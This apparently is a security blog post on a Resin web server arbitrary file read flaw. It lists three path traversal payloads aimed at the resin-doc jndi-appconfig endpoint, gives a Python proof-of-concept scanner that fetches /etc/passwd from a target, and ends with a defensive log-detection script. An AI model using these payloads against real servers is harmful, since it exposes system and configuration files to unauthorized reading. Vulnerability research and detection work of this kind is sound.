Resin Arbitrary File Read Vulnerability

What is Resin


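I don't think much of it, but here is the Baidu Baike entry anyway:
Resin is a product of Caucho. It is a very popular engine supporting servlets and JSP, and it is very fast. Resin itself includes a web server that supports HTTP/1.1. It can serve not only dynamic content; it is also very good at serving static content, with speed close to that of Apache Server. Many sites are built on this web server.
It can be thought of as a web server.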

Resin has an arbitrary file read vulnerability


"""
   payload1 = "/resin-doc/resource/tutorial/jndi-appconfig/test?inputFile=/etc/passwd"
   payload2 = "/resin-doc/examples/jndi-appconfig/test?inputFile=../../../../../../../../../../etc/passwd"
   payload3 = "/ ..\\\\web-inf"
   """

Resin arbitrary file read POC

# -*- coding: utf-8 -*-

"""
    Resin remote arbitrary file read vulnerability
"""


# Import dependencies (Python 3)
import sys
import logging
import requests
from urllib.parse import urlparse, quote


# Global configuration
logging.basicConfig(format="%(message)s", level=logging.INFO)


# Global variables and functions
payload1 = "/resin-doc/resource/tutorial/jndi-appconfig/test?inputFile=/etc/passwd"
payload2 = "/resin-doc/examples/jndi-appconfig/test?inputFile=../../../../../../../../../../etc/passwd"
payload3 = "/ ..\\\\web-inf"
payloadList = [payload1, payload2, payload3]


def getUrl(url):
    # Build the test URLs (plain and percent-encoded) for the given site
    urList = []
    if isinstance(url, str) and url.find(":") >= 3:
        parsed = urlparse(url)
        # netloc keeps an explicit port such as :8080
        base = parsed.scheme + "://" + parsed.netloc
        for payload in payloadList:
            urList.append(base + payload)
            # Encode only the payload; quoting the whole URL would mangle "://"
            urList.append(base + quote(payload))
    return urList


class ResinScan:
    def __init__(self, url):
        self.tUrList = getUrl(url)
        # Response markers: a passwd entry or a directory listing
        self.flag = ["root:x:0:0:root:/root", "<h1>Directory of"]

    def scan(self):
        for url in self.tUrList:
            try:
                response = requests.get(url, timeout=3, verify=False)
                for string in self.flag:
                    if response.text.find(string) >= 0:
                        return True
            except Exception as reason:
                # Message: scan error and its reason
                logging.info("[-] 掃描錯誤--錯誤緣由:%s" % str(reason))
        return False


if __name__ == "__main__":
    try:
        url = sys.argv[1]
    except IndexError:
        # Message: no target site was given
        logging.info("[-] 沒有找到目標站點")
        sys.exit(0)
    scan = ResinScan(url)
    if scan.scan():
        # Message: vulnerability found
        logging.info("[+] 發現漏洞!")
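
On the defender's side, the three request patterns listed above can be hunted for in web access logs. The following is an added example, not part of the original post; the combined log format, the sample log lines, and the rule names are assumptions constructed for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qsl, unquote

# Constructed sample access-log lines (documentation IPs); not real traffic.
SAMPLE_LOG = [
    '203.0.113.7 - - [01/Jan/2024:10:00:01 +0000] "GET /resin-doc/resource/tutorial/jndi-appconfig/test?inputFile=/etc/passwd HTTP/1.1" 200 1532',
    '203.0.113.7 - - [01/Jan/2024:10:00:02 +0000] "GET /resin-doc/examples/jndi-appconfig/test?inputFile=..%252F..%252Fetc%252Fpasswd HTTP/1.1" 404 310',
    '203.0.113.7 - - [01/Jan/2024:10:00:03 +0000] "GET /%20..%5C%5Cweb-inf HTTP/1.1" 200 977',
    '192.0.2.10 - - [01/Jan/2024:10:00:04 +0000] "GET /resin-doc/index.xtp HTTP/1.1" 200 8121',
    '192.0.2.10 - - [01/Jan/2024:10:00:05 +0000] "GET /app/report?inputFile=q3.csv HTTP/1.1" 200 411',
]

REQUEST_RE = re.compile(r'"[A-Z]+ (.+?) HTTP/[\d.]+" (\d{3})')
WEBINF_RE = re.compile(r'\.\.[\\/]+web-inf')

def fully_decode(value, rounds=3):
    """Percent-decode repeatedly so double-encoded input is normalised."""
    for _ in range(rounds):
        value, previous = unquote(value), value
        if value == previous:
            break
    return value

def classify(line):
    """Return (rule, served) for a matching request line, else None."""
    match = REQUEST_RE.search(line)
    if not match:
        return None
    parts = urlsplit(match.group(1))
    served = match.group(2) == "200"  # status 200: triage these hits first
    path = fully_decode(parts.path).lower()
    if path.startswith("/resin-doc/") and path.endswith("/jndi-appconfig/test"):
        for key, value in parse_qsl(parts.query):
            value = fully_decode(value)
            if key == "inputFile" and (value.startswith("/") or ".." in value):
                return ("resin-doc-inputfile", served)
    if WEBINF_RE.search(path):
        return ("web-inf-traversal", served)
    return None

def scan(lines):
    """Return [(line_number, rule, served)] for every suspicious line."""
    results = ((n, classify(line)) for n, line in enumerate(lines, 1))
    return [(n, *hit) for n, hit in results if hit]

if __name__ == "__main__":
    print(*scan(SAMPLE_LOG), sep="\n")
```

Any hit under /resin-doc/ also indicates that the bundled documentation application is deployed on a reachable server, which is worth removing regardless of the response code.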